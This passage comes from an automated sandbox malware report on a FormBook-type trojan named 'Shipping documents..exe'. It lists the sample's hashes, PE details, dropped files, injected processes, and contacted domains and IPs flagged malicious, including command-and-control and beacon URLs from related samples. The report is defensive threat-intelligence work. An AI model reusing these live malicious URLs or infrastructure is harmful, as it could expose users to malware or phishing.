                                                                                          https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://ozxs.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://ltqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://piensasolutions.com/imgs/parking/icon-parking.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://piensasolutions.com/imgs/parking/icon-facebook-small.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://piensasolutions.com/imgs/parking/icon-twitter-small.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://esfqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://twitter.com/piensasolutionsktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://34.92.79.175:19817/registerktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        13.248.169.48
                                                                                                        		www.telforce.oneUnited States
                                                                                                        		16509AMAZON-02UStrue
                                                                                                        161.97.142.144
                                                                                                        		www.030002128.xyzUnited States
                                                                                                        		51167CONTABODEtrue
                                                                                                        203.161.49.193
                                                                                                        		www.futurevision.lifeMalaysia
                                                                                                        		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                        188.114.97.3
                                                                                                        		www.bzxs.infoEuropean Union
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        31.31.196.17
                                                                                                        		www.servannto.siteRussian Federation
                                                                                                        		197695AS-REGRUtrue
                                                                                                        103.224.182.242
                                                                                                        		www.klohk.techAustralia
                                                                                                        		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                        199.59.243.227
                                                                                                        		www.auto-deals-cz-000.buzzUnited States
                                                                                                        		395082BODIS-NJUStrue
                                                                                                        154.92.61.37
                                                                                                        		www.huiguang.xyzSeychelles
                                                                                                        		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                        198.252.98.54
                                                                                                        		migorengya8.clickCanada
                                                                                                        		20068HAWKHOSTCAtrue
                                                                                                        154.23.184.218
                                                                                                        		d63dm.topUnited States
                                                                                                        		174COGENT-174UStrue
                                                                                                        3.33.130.190
                                                                                                        		beingandbecoming.ltdUnited States
                                                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                                                        217.76.156.252
                                                                                                        		www.cesach.netSpain
                                                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1549915
                                                                                                        Start date and time:2024-11-06 08:38:05 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 9m 58s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:9
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:2
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Shipping documents..exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@15/12
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 75%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 97%
                                                                                                        • Number of executed functions: 51
                                                                                                        • Number of non-executed functions: 299
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target FuFneNIzDsF.exe, PID 6116 because it is empty
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • VT rate limit hit for: Shipping documents..exe

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        02:40:04API Interceptor9642753x Sleep call for process: ktmutil.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        13.248.169.48icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.ulula.org/4w1b/
                                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.ila.beauty/izfe/
                                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.notepad.mobi/zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8
                                                                                                        r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.polarmuseum.info/9u26/
                                                                                                        MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.ipk.app/phav/
                                                                                                        New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                        • www.virtu.industries/i9b0/
                                                                                                        A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.thesquare.world/f1ri/
                                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.discountprice.shop/mt2s/
                                                                                                        NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.ila.beauty/izfe/
                                                                                                        Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.hopeisa.live/0iqe/
                                                                                                        161.97.142.14456ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002832.xyz/o2wj/
                                                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002832.xyz/l9k5/
                                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
                                                                                                        r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002304.xyz/jkxr/
                                                                                                        COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002059.xyz/4h9e/
                                                                                                        Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002107.xyz/fnq1/
                                                                                                        A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002107.xyz/e8he/
                                                                                                        VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002832.xyz/2nyl/
                                                                                                        FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002803.xyz/o3vr/
                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.030002059.xyz/2sun/
                                                                                                        203.161.49.193DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.harmonid.life/aq3t/
                                                                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.harmonid.life/aq3t/
                                                                                                        Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.fitlifa.xyz/6tsn/
                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.simplek.top/ep69/
                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.simplek.top/ep69/
                                                                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.futurevision.life/hxmz/
                                                                                                        Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • www.funtechie.top/udud/
                                                                                                        qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.winnov8.top/abt9/
                                                                                                        PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.innovtech.life/nq8t/
                                                                                                        RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.innovtech.life/nq8t/

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        www.servannto.siteSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 31.31.196.17
                                                                                                        www.auto-deals-cz-000.buzzSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 199.59.243.227
                                                                                                        www.huiguang.xyzSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 154.92.61.37
                                                                                                        www.klohk.techSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 103.224.182.242
                                                                                                        www.telforce.oneSALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 13.248.169.48
                                                                                                        www.cesach.netPayment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.76.156.252
                                                                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.76.156.252
                                                                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 217.76.156.252

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        AMAZON-02UShttps://u47918369.ct.sendgrid.net/ls/click?upn=u001.ZoCZETgJDKD-2FKvq1a-2Bqbn8ta8d94BJ71ZWM4NddFG9BNYa4zSgm5xozG6sQbxmU5D5hL85iqF140GJ6UG5nvQ8h9zqpzZN6TptwRH8YmWqCz4BhhWVyA4-2FGdi78BIf3v-2B7DR6p6O0O2iMltxPh-2BTVZzGBI-2BdwOvbNydWsHD-2FE3jskn-2BWjLG5mEA5NmkZDPRzetlrway-2BFvubwBO4HRvhVg-3D-3Dmeoi_-2Bc-2FE9fHJLEezMYVeHAjWA-2FCLTyAjjdsjmjoMWPOcqKulbzylExHQ2Bq-2F3BWB5j3k2UTXVbxJlycszSZ1lajkNfuZTcVvZ-2FvSGDyQmX-2FtcFOsY2mjWSEq1i80kCvMOrhUl4ALfB0EoZtPz4ZKLJkzU7FgeX-2FT9OOVwrlnZy4n0LZBObWOCx8zKd7nZMhFe-2BZc9Pem0kzkQw2yNab8z35ieg0OqT7JGePwZBZspCJwJURQ2RzMNYu1jql5xUEHxCdthZoQG0oXgKX7EC2zWVbmd3lbuIz4gnLx6gtjvJVPuORshK8UmeaYN3bhRbYtiwa1MzSTAh44aejae4PH1iW9eqQx6mkzXAmSRGDTqlaz-2BTMhcFb2TbX9Ireuri9431lneUhuzyBoFgsxNxrHmewEumQ5Fpbl3DMNlZWY6v-2BZeqOSKoZukPJvFMTp-2B0LlYiW2hSEEHpoW-2Bfkodr-2BXedOkEgHOpb-2BI-2Bo7iRsBMssyauw7e2G-2BtBTPlVRTMUKEi0sHkZnzyDwwvelrsZPDSeuUSJJbF5RsW6PuJ3rHQeLybAr5sY4N1iFLQRl4UXoM-2FW1USqeW-2FW67ju4oKy-2BxxK2RMyt1UamWC1e7ZMaHtLuobdKUFD-2B-2BLBUV-2Bt1L4C-2BjqlcRVfQXoWpIiBUrky3W8HrGlvsfUG6wd83TiHuew-2FQxPfj-2FiZisyJRXvaXYOHAqa17KLb3gmFP-2B5uXU8LjzG0ycYvWam8x9r5ppG8H3M12etKaXYgjAyYUFRLUyjayjoSrQYGFIaA5ZpLf0TnsLO-2F6gNVZ-2FafUtMAjrZaBWKnf4XbPftvvgD-2FYh-2Fjepxm5eyWvZ523sC9u7sDPMnlHy9SJkfmrT2lMQs12qzVb613rQa-2FDElHuue97Dli-2FDJHUvFFkCQGiWlvze9GWny9B9XIMqzHg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                        • 18.245.31.89
                                                                                                        https://silver-antelope-m9cbjj.mystrikingly.com/?utm_source=vero&utm_medium=email&utm_content=control&utm_campaign=%5BFR%5D%20collected_email_notice&utm_term=Transactional&vero_conv=GBpYhsIpFSmO05TsgO2IN7eUtOGrwxJACirOVzlE4e6zWd4dm3DHEZyvaBDTtpAFZF0Cm3GCbumw_58AcHo6T3Gk48-PDYSdMzS-9ufSTA%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                        • 13.224.189.122
                                                                                                        https://u47918366.ct.sendgrid.net/ls/click?upn=u001.skYLek12KWTy-2FVz15U1JGdpJfnayI4kQ0pGqHar3Dl5XD61duaRQIcmphf6sxsCT3pRESnljQSclapQG6uG3pGdVz-2B44bL9s03KAUTE5StMNIlD8xnCLLZ8lGkQWJZW6RJC-2FMS-2FmtqbnkGnTi61-2FLV9HYGRp5V27shTYXb-2BqWDMLram9L-2B8PCUCWTlPWwUYxTwD1kp50jJPmaqPt-2BzDZOg-3D-3DTS7W_AsQvLq31PKXxx3tM00egmVFtswxWHNiAKAW7v-2BME9y3foxrTpQ6z5Y5Y3k6TX-2BTbdqWMdZVTacuc-2FsKla-2BQnDyhxuGfrDPGC0inve5ZGuY9bJGKrM5EaK8IdC3aHxgKXMexjApq1Yv-2Fo2nkdHzmaIMX05B-2BRcK00sZCPCageoDHJ5VJcv4MzWUDlTtocfgkMJvTb5FZfkZhbfaTdVG8T1D8ISk1AiI0VZdOyElaDF2lwjvMkxASeOl3LDfxjUUKobeqbPPkPOL-2FFCEqbDPXvTtqSZ0LtfoDQBzIQYgv0-2BKqgncXiJO3Toa6oC4D8SJ9T4jEkCAaFVomtF-2BLa074AQSN6zNknHd44z3F5KFRlIdXHZ-2F-2FkKbletJGTpBctnhVIargZh-2B3ygn9ILvi3aWgJBsduA5d5SNlv1rw3CXA1dsDxrOxxIpnY0JrE-2BOs5oJ-2B0oEc3CA-2Blf0qvGEjijsr3WfQTSZOkB99gCE-2Bo0aX7F9iVua9ZZWaZcF0NGZ02mJAAvIwQeWbC7KgOj-2F6rxhTm6MvTu3h0fQLZ2ipKLD84nXxWl4nGhRYgr9-2FXlS5jJbBnp3hKIUm0d4tdscG5h7j5bPTxgkBc4NlTYmfh3kgGEJER3U0pW7a-2FRKc98R6qmb2qW4Qgxj1vjPRWmKm55m3tZsVDmhUWrOY5ncaMRfKm-2BmGDb9sWprjksdUMBBQYJ3X1NNYC0PHUK9-2BeRED5iZxcfjghmBF5dlIbtRWXUGeRHYic4hdbqwWvgvomaNePBSF1zDDtCPk1hkiYrlVpodlRsRYqLYtiPhuhu6aIUn-2BVFWMHf9ydplKIkghsxI2bAOKFPZhPyAvHJwJqMGZ2ukaqMBlHPEUWpx-2FduLBjNhbyEIk-3DGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                        • 18.245.31.33
                                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 13.248.169.48
                                                                                                        D7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 18.166.41.103
                                                                                                        company profile and iems .vbsGet hashmaliciousUnknownBrowse
                                                                                                        • 185.166.143.49
                                                                                                        https://ohpky5.fj78.fdske.com/e/c/01jbx9w45rt8n7dv9hga5bx34b/01jbx9w45rt8n7dv9hgd1yw31dGet hashmaliciousUnknownBrowse
                                                                                                        • 18.245.86.7
                                                                                                        https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 52.16.55.91
                                                                                                        example.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 54.171.122.26
                                                                                                        1V4xpXT91O.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        • 18.244.18.122
                                                                                                        CONTABODE56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 164.68.127.9
                                                                                                        COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 161.97.142.144
                                                                                                        evhopi.ps1Get hashmaliciousLummaCBrowse
                                                                                                        • 173.249.62.85
                                                                                                        Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 161.97.132.254
                                                                                                        https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                                                                                        • 173.249.62.84
                                                                                                        VNPT-AS-VNVNPTCorpVND7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 203.161.46.201
                                                                                                        56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 203.161.41.204
                                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 203.161.41.204
                                                                                                        arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                        • 14.250.58.12
                                                                                                        sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                        • 14.255.140.94
                                                                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 203.161.49.193
                                                                                                        nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 14.190.8.166
                                                                                                        arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 14.237.62.11
                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 113.162.218.53
                                                                                                        mips.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 113.162.218.36

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\283026M3L

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\ktmutil.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                        Category:dropped
                                                                                                        Size (bytes):196608
                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\bothsidedness

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\Shipping documents..exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):288256
                                                                                                        Entropy (8bit):7.9936799190369054
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:6144:5ZOs4Mw2mkCK2INv74qZzpLZARhryg8iOmMU7w3WcR04D:6sjw9ShptOkgemMU7hc/D
                                                                                                        MD5:D00088C0090AD25DB25DD4440F8AF2E6
                                                                                                        SHA1:4C850583ADC2F3CCEDFABBED405D88DBF93DA44E
                                                                                                        SHA-256:CFB5905A487282B41BDD24CC4598B1A4A6DAFF79C28B1DA4687D3B8486BE3634
                                                                                                        SHA-512:3759B1C510D3FBA4FCEB75AF4279F3FD7FE827219902C2D3AC8C0D609884A7019A5996646A20A9C8622A595F3F8231CAC2B6DE8AB202F447132A56135306A4EC
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:~o.e.MHSH...J...t.RD..LE...M5OCYIBGHHRG35Q7OMHSHM5OCYIBGH.RG3;N.AM.Z.l.N..h./!;r7AZ6E. h0)#[ 7y+'g:=<gZ[qs..h>')PaNTCfGHHRG35(6F.u3/../$.t" .R....1P.W...qU(.C..t(5.a\2_r-/.HM5OCYIB..HR.24Q..)SHM5OCYI.GJIYF85QcKMHSHM5OCY.VGHHBG35!3OMH.HM%OCYKBGNHRG35Q7IMHSHM5OC)MBGJHRG35Q5O..SH]5OSYIBGXHRW35Q7OMXSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5Om-,:3HHR.a1Q7_MHS.I5OSYIBGHHRG35Q7OMhSH-5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OCYIBGHHRG35Q7OMHSHM5OC

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.51884649812339
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:Shipping documents..exe
                                                                                                        File size:1'322'107 bytes
                                                                                                        MD5:3fbab2b42254852fc8d71f14b2862a43
                                                                                                        SHA1:51b8d33a892260ec1d0d5aee4971998756532f0c
                                                                                                        SHA256:0452cf013ff76bb1e537ac2b17b081fc2eaf7c5d302f3e838e1e854de2850896
                                                                                                        SHA512:d8fe9ea34aab1f890cdea16f2b6c081e0e9201443066cb0e3d706e093bc8df94bd2ab34eecdfbfdbcec0cdb80d69a296f75f72f122c76cdda280c9fda931ab70
                                                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCnYOl/SkYRg0JhFnnY01+NJ3UTh:7JZoQrbTFZY1iaCYW/3YRBhFnvF
                                                                                                        TLSH:3D55E121F5D69036C2B323B19E7FF36A963D69361327D19B23C82D325EA05416B39723
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                        File Icon

                                                                                                        Icon Hash:1733312925935517

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4165c1
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        call 00007F6F1110D79Bh
